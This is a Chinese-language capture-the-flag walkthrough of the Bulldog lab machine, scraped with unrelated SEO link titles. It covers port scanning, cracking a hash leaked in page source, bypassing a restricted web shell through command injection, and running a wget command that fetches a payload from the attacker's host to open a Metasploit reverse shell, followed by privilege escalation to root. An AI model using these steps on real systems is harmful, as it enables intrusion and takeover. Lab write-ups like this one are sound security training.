当前位置: 首页 > news >正文

网站建设应用技术wordpress数据库用户名密码忘记

网站建设应用技术,wordpress数据库用户名密码忘记,wordpress文章墙插件,dede打包好的网站怎么提取模板声明 文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为! 开搞 首先nmap扫描目标机开放端口和服务 访问80端口 扫目录撒 发现登录口 点击web-shell提示登录后才能使用 /dev/下面查看网页源码发现村咋h…

声明

文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为!

开搞

首先nmap扫描目标机开放端口和服务

在这里插入图片描述

访问80端口

在这里插入图片描述

扫目录撒

在这里插入图片描述

发现登录口

在这里插入图片描述
在这里插入图片描述
点击web-shell提示登录后才能使用

在这里插入图片描述

/dev/下面查看网页源码发现村咋hash值

在这里插入图片描述

awk提取hash

把那堆复制到1.txt中提取
在这里插入图片描述

在线解密

https://crackstation.net/
在这里插入图片描述

nick/bulldog登录

在这里插入图片描述

进入web-shell

可以执行命令
在这里插入图片描述
但是很多命令不让用
在这里插入图片描述
可以用echo `curl` 的方法绕过限制
在这里插入图片描述

创建反弹shell

python起个服务

在这里插入图片描述

wget下载到目标

echo `wget http://192.168.2.129:5555/5555.elf`

在这里插入图片描述

msf建立监听

在这里插入图片描述

给5555.elf添加执行权限并执行

在这里插入图片描述

拿到shell

在这里插入图片描述

进入shell

在这里插入图片描述

查看家目录有啥

在这里插入图片描述

查看hiddenadmindirectory

查看note
在这里插入图片描述

密码藏在customPermissionApp

SUPERultimatePASSWORDyouCANTget
在这里插入图片描述

结束

因为这个文件是bulldogadmin的文件,我的身份是django,所以需要sudo 去给他加执行权限,sudo chmod 777 customPermissionApp就要用到django的密码
执行后变成了root权限
靶标一般就在root目录下
在这里插入图片描述

http://www.yayakq.cn/news/559262/

相关文章:

  • 网站建设活动策划方案商城版手机网站制作
  • 中山网站设计与建设网站和网页的区别是什么
  • 网站建设客户管理系统做便民工具网站
  • 网站开发实例社区厦门手机网站建设公司
  • 无锡城乡建设部网站首页常用素材网站
  • 爱站网ip反查域名福利博客wordpress
  • 网站源码怎么获取wordpress 生成图片
  • 张家港安监站网址旅游网站模板免费下载
  • 什么样的公司需要做网站电脑网络连接正常但是上不了网
  • 价格合理的网站建设企业网站用个人备案
  • 怎样注册网站帐号申请wordpress flash主题
  • 犀牛云 做网站权威的南昌网站设计
  • 河南app网站建设外网如何查看局域网建设的网站
  • 设计本官方网站广告杭州信用网官网
  • 饮食网站建设策划书seo优化厂家
  • 做网站代下在线网页代理网址
  • 免域名x网站网站要什么软件做
  • 如何查看网站是哪家公司做的?背景图片设计在线制作
  • 泸友科技网站手机如何注册wordpress
  • 子网站 两微一端的建设方案赤峰酒店网站建设哪家便宜
  • 大连网站建设渠道贴心的广州网站建设
  • wordpress跳转站点创业众筹平台
  • 佛山网站制作网站软件系统开发报价表
  • 网站不收录怎么解决接收外国电视卫星天线
  • wordpress 漂亮的主题佛山快速排名优化
  • 阿里云服务器管理天津企业网站排名优化
  • 开发一个网站平台多少钱怎么做网站导航条
  • 免费打开网站加强网站建设和维护工作
  • 做初中数学题的网站免费视频外链生成推荐
  • WordPress找不到站点常州网站推广公司哪家好